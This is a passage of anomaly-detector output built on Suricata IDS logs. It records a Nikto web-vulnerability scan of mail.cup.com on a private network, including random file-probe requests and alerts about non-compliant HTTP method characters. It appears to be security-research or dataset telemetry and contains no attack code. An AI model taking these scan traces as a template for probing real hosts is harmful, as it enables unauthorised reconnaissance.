"{\"timestamp\":\"2020-03-04T19:18:34.243594+0000\",\"flow_id\":1380698825602070,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46856,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htaccess~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htaccess~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.244892 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46858 -> 192.168.10.154:80", "/parser/model/time": 1583349514.244892, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46858, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.244892 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46858 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.iso-ru", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.245043+0000\",\"flow_id\":1686874159233612,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46858,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso-ru\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso-ru\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.245043, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1686874159233612,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46858,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso-ru\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso-ru\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46858,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso-ru\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso-ru\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.iso-ru\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.iso-ru\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.iso-ru", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.iso-ru", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46858,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46858, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1686874159233612,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1686874159233612, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.245043+0000\",\"flow_id\":1686874159233612,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46858,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso-ru\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso-ru\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.246745 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46860 -> 192.168.10.154:80", "/parser/model/time": 1583349514.246745, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46860, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.246745 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46860 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.nl", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.246933+0000\",\"flow_id\":1913111561551927,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46860,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.246933, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1913111561551927,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46860,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46860,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.nl\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.nl\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.nl", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.nl", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46860,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46860, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1913111561551927,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1913111561551927, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.246933+0000\",\"flow_id\":1913111561551927,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46860,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.249275 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46862 -> 192.168.10.154:80", "/parser/model/time": 1583349514.249275, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46862, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.249275 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46862 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA\\/", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.249681+0000\",\"flow_id\":201554209196080,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46862,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.249681, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":201554209196080,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46862,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46862,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA\\/\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA\\/\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA\\/", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA\\/", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", 